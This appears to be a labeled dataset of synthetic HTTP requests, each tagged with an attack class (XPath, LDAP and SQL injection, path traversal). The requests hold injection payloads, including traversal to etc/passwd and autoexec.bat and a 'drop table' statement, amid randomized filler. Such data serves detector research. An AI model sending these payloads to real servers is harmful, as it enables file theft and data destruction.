GET /pr/rilogNitvcxgeuse/ohRggEgCecgMgiS/rDwVkUw6v/iG1X/9eua4re45ne2hprtuvt0.aspx?2Oe5tncu8oh=30832&d5ka=%25d-&hnr=eueeme&4s=5252&eIiloso=t3IKd9f&ptmd=34621135&tWmhOg=%2Bn++b&a2ehwow9whtec=tsy HTTP/1.1
Host: www.w5cM.de:8
Connection: keep-alive
Accept: audio/basic
Accept-Charset: x-mac-chinesetrad, ks_c_5601-1987, shift_jis
Accept-Encoding: *
Accept-Language: 9 or 1<   h/lokssi/3en/child::text()[position()=0]    or  5='] | /* | /foo[bar='
Cache-Control: max-stale=342
Client-ip: 29.211.81.81
Cookie: tgti=219288;Euaacnojm=i
Cookie2: $Version="9"
Date: Tue, 17 Apr 07 20:35:30 CET
ETag: W/"683Tkn1roCDkCKGYEt"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Sun, 12 Sep 04 13:39:33 UTC
If-Unmodified-Since: Fri, 21 Dec 07 11:57:16 CET
If-Match: *
If-None-Match: "BV0Gx3O0DHak6g7wa"
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 0688
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic dG5tb2ZrRTplaWlkeQ==
Authorization: NTLM cmhmYmtpRTZ5aEdkeTFyN3BlWENoZmNEY2xuT290dXRuaXZnTGxhUA==
Range: 508-6,8-
Referer: http://lpwOou.net/cudehrei/nuleqii/nzsse2i/oizst/EIqh.asp
TE: trailers,deflate,trailers
Trailer: If-Modified-Since
User-Agent: ce1sOo (aRJQCXcF3)
UA-Disp: 296,6544,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 433x249
Via: HTTP/5.3 103.181.80.84
Transfer-Encoding: compress
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 515 www.ym4eeqof.jpg:0 "8RqeaelobLhe" "Thu, 13 Nov 08 14:12:40 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48323
Start - Id: 49364
class: XPathInjection
GET /bF/2gRfg8m5iecnE4tanyfo/n6tm/eehthceqpsaRtL/idZsBktrGG/c1isrneeilnemn/STrSseta8ti/noea.cgi?omotreeeit=a5dftpnodes0I%2Fe%3Cforya&sT=810585&uyem35tee8=xieRgLdretheo0&jKN51systemw4ZRHR=ai4formds%5ChrLr9erb&yaMwceoBnH=esiar5d%27+++or++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i%2B+++j++%2B++k+%2Bl+++%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27sie%27++%3D+%27++++qtit%27++++or HTTP/1.0
Host: 186.142.175.130:80
Connection: keep-alive
Accept: audio/x-wav;q=0.1, text/*;q=0.4, text/html
Accept-Charset: windows-1254, x-mac-arabic, iso-2022-kr;q=0.1, cp-932
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-age=97512
Client-ip: 30.6.154.223
Cookie: eAr=3;hbath9sgr5soe=hqt1@-tSuyCH
Cookie2: $Version="93"
Date: Thu, 22 Nov 07 22:27:38 GMT
ETag: "gRqaxicCjKmiIeMRRJ"
Expect: aaso
From: deodan@edhI.net
If-Modified-Since: Mon, 15 Mar 10 13:03:58 CET
If-Unmodified-Since: Fri, 10 Oct 08 06:00:11 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.9
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: gEen je4f=me70Ymri
Range: 8044-09,976-
Referer: /o1uoreig/d3tu05.txt
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Tretotnoet
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: 7Ebau/2.5 108.53.127.40, 9.2 www.eatkmm.shtml:8
Transfer-Encoding: compress
Upgrade: wsem/7.8, MtRxo/3.9, i75/3.8, tecnp/1.2
Warning: 935 246.135.154.171 "wpboie" "Tue, 30 Jun 09 03:56:30 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49364
Start - Id: 45636
class: PathTransversal
GET /easbcefae/g24e0en4s/oI3P8YjUE1u7M@z/imcns60erSaoo/eUCan0winwKR3sRSa6Z1/hpPkshoLUPkknMpStK/ma5y80YflinkOUyiT/r4OM00wjult0/ralceulhtar/0tcTeiillN/6iusoc.bin?7otepgnpeE7o9dr=eh&nn=emtaer%29eaxHae&scripthTMT8C=treWuIausrSksC&arWse=1&mtguiqob5aondu=vbtu&glea2zwUebfewel=wyIqpxgywZ5E&onssklucoeWfc=phpc&2loeeTpNiodqt5m=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&kAs0su4sh=0 HTTP/1.1
Host: 190.223.51.78
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1250;q=0.4, x-mac-icelandic;q=0.7, windows-874, macintosh;q=0.5, euc-kr;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: Rgm-esv, l-tmiw, r9ehwi-6oqu22a;q=0.6, stadc-tpttqstd
Cache-Control: no-transform
Client-ip: 220.15.215.234
Cookie: A_bQ=mAwr;0eErtaqhh=a?;h1k9U7aQ1NAS=jailikegavarteoED<K;zTtthetzecgel=1454
Cookie2: $Version="56"
Date: Mon, 10 Nov 08 24:14:12 GMT
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: Ylhtncs
From: goqp9c@mhshz.org
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Wed, 02 Nov 05 13:59:52 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: "yeVFiT5pXsOY.0tcI"
If-Range: *
Max-Forwards: 3719
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic aWFyYjk6dFlodw==
Range: -5753
Referer: http://www.liretcqi.gov/eseb/aw6tenc.shtml
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: cocln/6.6
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: rOpnor/5.5 www.oie7wag.shtml:70, HTTP/5.6 www.eoe38.jpg
Transfer-Encoding: identity
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45636
Start - Id: 46307
class: PathTransversal
GET /rtptaei/ee3laEwee5/itwrcaGattdaddnao/eowpqtomaxsl0/rhp1g3/ihHgtugr6.4wQFq/rwtsIvdorq1etsnxni/vddnulldm7E/r4MLldWLW/eohseeaa/yLMtmpO.jpg?uMdsTchq2sQq=eotsrq&hhbyng=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&eaMeI=7347183&g9igtttetae=fetddocument08&Bds=6on0oLafoeamiItd&gaj=yKV0PSTxjoHG&eE=%3Asnmacopyesh&bs4iaecrie=8179 HTTP/1.1
Host: 37.64.210.12
Connection: 0n6i0n
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nmrvpge-dr;q=0.5, ea0LthsT-2LiN;q=0.3, xueHr-OwIh82i
Cache-Control: r='iljs1skt'
Client-ip: 16.36.50.179
Cookie: cHabimesisi=7;Cton7e=hpositionopeendwp-d;rtcEwtaantsFeu=h1hu5D;eusan4ee2qoebg=t;He0wleize=27;fSa_=sLj9Pgvvl
Cookie2: $Version="53"
Date: Sun, 01 Mar 09 22:11:21 UTC
ETag: W/"X6BJrt.UWHlAh@dky"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Wed, 26 Mar 08 12:15:17 CET
If-Unmodified-Since: Mon, 02 Apr 07 22:38:59 UTC
If-Match: "d7hVVzv@k-gaOxdW73NK"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 014
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM SWV0eWl5NXJoSXNUbG9pZXpveW5kclRvb2xiYXlmY2NhYXQ=
Authorization: thxnbk kedS=0knxosl0
Range: 4090-
Referer: http://tfre.org/nuihewc/fen4/hhmlr.cfm
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/3.4 (Windows; U; Win98 7.1; bb-8a; rv:8.6.8) Gecko/52668835
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.2 www.nREya.jpg, ziae/4.4 24.120.172.85
Transfer-Encoding: deflate
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 733 13.150.194.194 "tn9trrrTditsmhmen" "Mon, 28 Nov 05 14:46:45 CET"
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46307
Start - Id: 50084
class: XPathInjection
POST /wFs@/ieszYZMA6G7uSX3R/lEd/nseaarloaed9tdEmmao/tin5u/d77vkbbJdykkn/rK/lshutdownfJ@/hmAtIs3@HNg.OF/oPLeTM0U3varol6.msf? HTTP/1.0
Content-Length: 297
Content-Language: pnae,m6,h
Content-Encoding: gzip
Content-Location: /iAsai/emtat/Shc2bei.gif
Content-MD5: ZVBhM3RlUm9sYXBjbjNqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jan 07 06:56:05 GMT
Last-Modified: Tue, 28 Feb 06 05:53:26 UTC
Host: www.4ryen.cz:42
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.8
Accept-Encoding: compress;q=0.8, gzip, deflate;q=0.3, identity;q=0.8
Accept-Language: eeinn-nnnaek;q=0.0, fpe-cgfh;q=0.4, 1-yertebe
Cache-Control: no-transform
Client-ip: 82.164.87.92
Cookie: MxohihAt=oumn' or     (i   <   count(ehttm/child::text()) and   j   <  count(nme/child::comment())   and k   <    count(pte/child::*)   )  or    'ia'   =  '  t9xL'  or;snTa=cNm.kyG;ao=doseibinnxml;2dOo=oiRCNriahe7teee;Yy= %u2e-Ee|euU;drrtisidws3=29
Cookie2: $Version="817"
Date: Sun, 30 Dec 07 16:52:17 GMT
ETag: "t31SLRX0H8ocwmOuxeu1"
Expect: 100-continue
From: cdn1@hrper5Rme.gov
If-Modified-Since: Thu, 31 Aug 06 15:54:13 CET
If-Unmodified-Since: Tue, 16 Mar 10 04:28:56 UTC
If-Match: *
If-None-Match: "ozdE_cboA1RHUAar_1o"
If-Range: *
Max-Forwards: 6057
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic b2ZlZ29uMjptYWll
Authorization: Basic bmViZXk6cmxhejVheQ==
Range: 259544-
Referer: http://www.isgkw.st/hetel/Onswpeyu/p0snienh/crlst/R49ggsee.jpeg
TE: trailers,chunked
Trailer: Date
User-Agent: fnhnbs (t.47Oqo; eJ5faN; rAcBqW0)
UA-CPU: x86
UA-Disp: 1584,447,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2565x545
Via: 2.2 14.68.184.35, otr/4.1 0.39.18.112, HTTP/8.9 136.204.21.208
Transfer-Encoding: compress
Upgrade: eeEbe/6.7, haia/3.9, ajjwD/1.2, hlsos2/4.8, o1ae/5.7
Warning: 655 8.146.131.14 "dxoce5aih3rnnfYua" "Tue, 17 Oct 06 23:28:47 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kln4GImh=583756&UD@window.openI=837246010&3libnulli6replace_J=nau ausrpmyDt&leith&facuotd=aEjygvI&tNejoees=31&ailsertg=181107&insh1oaeee=egTs5Ljseof&1aArmeSeocdoN=15152456&niontji=467854&toistbefg0apn=mm&fXFjWXB0=synulmj7tw1&Dr=n4uMzy-E&.eQERL=zaxtejigve&-htpass8BM5ZF=581295509&isOhwreqdTs7=nne

End - Id: 50084
Start - Id: 44765
class: PathTransversal
GET /ml_Wrulo0ZmW--S1MTOl/dyxd/mepnpafA9t/rM4y/odm.css?nioenteomn2dysy=rges98&tykbeepecas=ncmYedlrpdtnse&vhollfxOrSTi=710452&rntg=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&gwtmaeCt=d0EtPFdrm&t7l3elif8lt=aXt6e7&goeefet=tktmooOIhaMo&8inrksxr4=822&tf5pae7ie=ncdqlikedey&sxob=aUHw6d HTTP/1.1
Host: 39.134.37.204:80
Connection: close
Accept: audio/x-wav;q=0.1, text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: aewtehl-sq0m, 8h-Dgih, p2ghrts-hxh;q=0.4, geqMm-oess;q=0.4, osv-elBms
Cache-Control: only-if-cached
Client-ip: 79.146.136.249
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="28"
Date: Tue, 03 Mar 09 03:55:19 UTC
ETag: "Td0bO0Q80mtdsptX"
Expect: ammm
From: Strga@kmekoca.fr
If-Modified-Since: Sat, 27 Dec 08 07:20:09 CET
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: NTLM ZGlveUl0bXRJbG9zZDlpYWRuZ0l1c3Rlbm13Y0V6RXNoc2lsZGVycG5vbUU=
Range: 6578-336232,-258470,45228-5909
Referer: /nson/Dtqw5ui/s197se/rbemr.css
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 1.2; nr-av; rv:5.5.5) Gecko/82186530
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: get/0.4, rgtf/4.9, Eac8/3.7, zbsjne/6.4, erdN/2.3
Warning: 075 226.115.253.85 "3EIasrapsapthhse" "Sun, 24 Oct 04 16:27:54 CET"
X-Forwarded-For: 177.203.165.156
X-Serial-Number: 29099
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44765
Start - Id: 46221
class: PathTransversal
GET /0azulx.png?eusNPsiOgaua4wN=hpso%29ckrvbscriptloglikenn1&wd8ctora2re=fUXufk&2LoCws4syO=wra%2Fe&rjdo=59631&mdkrcni=lw-loFn&g3lyn1H=00198&popiliFito=oa%3Driko%3Csh%7C%7Cets4l&2tToorNt3heeeon=ctsnnmtwba&etcTPxml=smetamiorEeonn&qenresluGefsc=304052&oDGDKposition=g%3A%2F.htaccess%7E&ra=+lb&ao3=rtoi4&melr=pslEgtec%299mcaad HTTP/1.1
Host: www.C63L.org
Connection: keep-alive
Accept: audio/*, video/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dOc-eyy44, sert-ei
Cache-Control: no-transform
Client-ip: 184.19.40.250
Cookie: LVwinntdnAK=1453811640
Cookie2: $Version="6"
Date: Fri, 04 Sep 09 04:32:41 CET
ETag: W/"T3S71sqPNBzZRCk"
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Mon, 24 Jan 05 03:06:21 UTC
If-Unmodified-Since: Sat, 02 Dec 06 20:45:22 GMT
If-Match: "s6XdC3r7UwfkJudSqtY"
If-None-Match: *
If-Range: Fri, 16 Nov 07 24:52:34 CET
Max-Forwards: 8487
MIME-Version: 5.5
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: http://dieoh.org/n6AtO/fsw2/eoa3.fgf
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: oeTaoazj (nzeKLaJ; a@G9giVT)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: eeesu; aAMy=6hnpsn5
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 677 234.22.108.123:360 "tgee6rvkuora" "Mon, 22 Jun 09 20:41:00 CET"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46221
Start - Id: 37243
class: LdapInjection
GET /sybIeroD7/dHhCdBt/Woplonbt6teIa/ZmvoQBg/iEbw4TY3Rj_3.Q2zg/et/rpzi3GXPOHgfueE/varAKlju-Ya.exe?gRxoR=n9aee%29%28+%7C+%28nsotn%3D*%29 HTTP/1.1
Host: www.olhbsomern.net:60
Connection: close
Accept: application/zip;q=0.2, video/mpeg, audio/*;q=0.0
Accept-Charset: us-ascii;q=0.0, euc-tw, iso-8859-7;q=0.2, x-mac-hebrew;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 152.109.136.236
Cookie: deey=K 
Cookie2: $Version="556"
Date: Fri, 27 Nov 09 21:57:10 GMT
ETag: W/"fGQbBlOes2k28gT0z"
Expect: nnsar
From: setrsl@itqn6e.net
If-Modified-Since: Thu, 28 Dec 06 21:09:23 UTC
If-Unmodified-Since: Sat, 09 Jun 07 09:58:36 CET
If-Match: *
If-None-Match: *
If-Range: "A1up1YKmbEegNY7Jj0"
Max-Forwards: 413
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: http://www.6ntseTi.ch/0nmhpr/sleaeeA.php4
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 8.2; na-eh; rv:1.9.0) Gecko/68896022
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: identity
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37243
Start - Id: 49059
class: XPathInjection
GET /txoesont2onkwXhuw/ehbtHux93iakh/y0acHyP4p_locationSN/m3naf69gIoyErn/TH1pdy/iGorlceytirF/ai9sn51fen/o3tMjmrOyUG82o2/sx7mSoN-w-7Fkay_Yq1a/tuu/tEteamS2ns/fQk@HzHuX@Re.php?uneepodeicc=erRtht&nioid2tsnmTf=oq+hr&M2k1bb=R%27rsihsfs+Cd&rjdiHh=gaeiln1s5h&ditoahmkapnuti=4460&tsEp9o=7-f&riaics=pozM75&ijInOspr=i9jJo9B&se6efayu2djna=n%2FAe%2Fi4t%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D+++or+%27aS%27%3D++++%27&@JHOQ@Q5VXbody=3&jueate0yi5tatev=%3Do&lndeghmaa9Els=varm&ybsitsT=i-lwWxkN5&8zrp9lboaeRg=y4ueYx6eaqn HTTP/1.1
Host: 110.104.79.8
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1258, x-mac-arabic;q=0.8, windows-1258, windows-1257
Accept-Encoding: 
Accept-Language: Agp-snda, trsf-Crn, itdsr-e;q=0.9
Cache-Control: max-age=197
Client-ip: 128.20.246.63
Cookie: gea=hitk
Cookie2: $Version="84"
Date: Sun, 14 Dec 08 19:19:52 UTC
ETag: W/"YX5bzwZtwNQk4-0no3z"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Mon, 09 May 05 22:21:06 UTC
If-Unmodified-Since: Wed, 07 Feb 07 19:35:07 UTC
If-Match: *
If-None-Match: *
If-Range: "-fyfkGnTp4kv0snB"
Max-Forwards: 872
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic bXIxdHJuOm9zcGE2
Range: -17536,8-,-310
Referer: /r4Qoif.swf
TE: chunked,deflate;q=0.8
Trailer: User-Agent
User-Agent: 3riW/5.4.4
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49059
Start - Id: 41180
class: SqlInjection
GET /bpzcuTinclude/o3DzR/1p.Z5Wfjbu8yl/ehdiao/mB8xH.gif? HTTP/1.0
Host: www.riui7doez.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-2022-jp, iso-8859-1, us-ascii
Accept-Encoding: *;q=0.6
Accept-Language: OrigText'OR'aiecxh'=  '4aa'
Cache-Control: max-age=36143
Client-ip: 94.242.254.161
Cookie: elenoesrdaentt=shfte0titie6co
Cookie2: $Version="21"
Date: Tue, 22 Jul 08 08:35:50 CET
ETag: "rCPRKGsYtiLX5mGhQUHw"
Expect: ceo9ee=xhIpcme;toatouM=3tone
From: mecty@ntysdF.de
If-Modified-Since: Thu, 10 Dec 09 21:59:11 UTC
If-Unmodified-Since: Fri, 01 Jul 05 19:48:38 CET
If-Match: *
If-None-Match: "ElBCQ8Lawoz48ph3.836"
If-Range: Mon, 14 Mar 05 21:47:03 CET
Max-Forwards: 4658
MIME-Version: 8.9
Pragma: cY2=tno
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: hsbtt Tmleeehe=EdeiNse
Range: -904358
Referer: http://www.roain.biz/3nijva/mHTyp/pste/bijiLTn.gif
TE: chunked;q=0.9,chunked;q=0.2,trailers
Trailer: Accept
User-Agent: hEdieegrhdt
UA-CPU: MIPS
UA-Pixels: 724x926
Via: FTP/3.0 www.2oi6.jpg, 5.4 www.oh6mn.gif, HTTP/8.0 110.136.244.77
Transfer-Encoding: gzip
Upgrade: delaks/6.4, u3ts/7.2, eriEl/2.3, mehun/9.8
Warning: 572 www.ettslzed.tiff "ur5thincCbfLtamlyoaS" "Sun, 21 Jun 09 08:46:44 CET"
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41180
Start - Id: 42209
class: SqlInjection
GET /uErisn4e3F/eTe9tiz/t6NUyid31Lk/a49mm_7t3E4fBI.qmd.sh?tnwsov4tnktqce=%27%3B++++drop+++++table++mmlrnCbesfe&sasEtrmne=r9hftotalat0Ltl HTTP/1.1
Host: 237.61.240.157:80
Connection: close
Accept: text/xml, image/jpeg
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: Espa-S, oeIs-igkemjte
Cache-Control: no-transform
Client-ip: 110.245.212.227
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="7"
Date: Tue, 04 Aug 09 22:04:55 UTC
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: ori1n=c62orr
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: "-AYkDfPTiqoR_X@7o"
If-None-Match: *
If-Range: Wed, 31 Mar 04 05:34:12 UTC
Max-Forwards: 721
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: Digest nonce
Range: 8473-303,-227666,770360-
Referer: http://www.ahkicR.biz/TirtaR/nneneds/Eirtoza.tiff
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 0.3; rB-Ie; rv:1.7.6) Gecko/53575459
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 2.8 9.251.32.190, HTTP/3.1 www.iekur.css, FTP/5.5 www.3hrm.htm:93798
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 625258146857624239
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42209
Start - Id: 37037
class: LdapInjection
GET /0yBiRli/M5YHm82Cjyv0d/eDjfoFV3Uq8D6/u43ImtrDiKe4Skah/Pnph-WLR_dKfK/d@Il.html?Ean4hoemrktv=oi&ecrasno=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 129.5.158.133
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.3
Accept-Language: *;q=0.6
Cache-Control: max-age=86
Client-ip: 55.15.65.177
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Sun, 19 Sep 04 17:14:39 GMT
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: ugo11f@oeeH7o.uk
If-Modified-Since: Sat, 17 Oct 09 14:14:03 UTC
If-Unmodified-Since: Tue, 09 Dec 08 04:53:48 UTC
If-Match: *
If-None-Match: "xA.HK8rw-qF53ktNCer"
If-Range: Wed, 21 Oct 09 21:18:47 UTC
Max-Forwards: 1125
MIME-Version: 5.5
Pragma: qsj=vnrt
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="eaohe"
Range: -742236,5-8909,-634
Referer: http://DadEP.be/trodd/evaoxl/fdha/mrogbeI.gif
TE: gzip,trailers,gzip
Trailer: Date
User-Agent: Mozilla/4.9 (compatible; MSIE 9.2; Open BSD i586; nwheujhL)
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9902x0663
Via: HTTP/6.0 124.140.210.216, 8.9 www.nbar3.shtml, 2.9 www.hutht6en.png
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 929 www.pogutin.htm "rmhurl" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37037
Start - Id: 45979
class: PathTransversal
PUT /Rftehrttun2eryk/Tu_XdfQt9FWSSrP/o6Ot6Z5K4oyKyd/rSS/ainatbtde9laasstio/l3seYEwSamto2t/FdV/rhdImctd/800aBZq_4HHNFZHE4FEj/http4z8Oy4SP7@L0I/e1rtuwJr2revskaefatf/dteleTea.php4? HTTP/1.0
Content-Length: 40
Content-Language: rjYntre
Content-Encoding: identity
Content-Location: /tei0rul/Seekwec/zhfrsjs/dfmvAyo.css
Content-MD5: MWlld201eldudFN6ZE9haw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jan 06 21:26:07 GMT
Last-Modified: Tue, 02 Feb 10 06:14:31 UTC
Host: 222.59.143.181
Connection: close
Accept: image/jpeg;q=0.4
Accept-Charset: windows-1255, windows-1251;q=0.7, euc-tw;q=0.0
Accept-Encoding: \autoexec.bat
Accept-Language: u-t, Hc9l-ereri;q=0.3, lSyMkg-o3siire
Cache-Control: only-if-cached
Client-ip: 121.84.201.116
Cookie: ms=eZPXVsre;mdzenlisginyns0=s objectaF$ r;boR=114306;attuyu=879;P_rjgT4=687481
Cookie2: $Version="1"
Date: Thu, 29 Nov 07 04:18:08 GMT
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: 6tcdao4o
From: lapnn@rne0nheDa.de
If-Modified-Since: Fri, 27 Apr 07 22:20:40 UTC
If-Unmodified-Since: Fri, 06 Jan 06 11:43:55 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Jun 07 14:31:50 GMT
Max-Forwards: 66
MIME-Version: 4.8
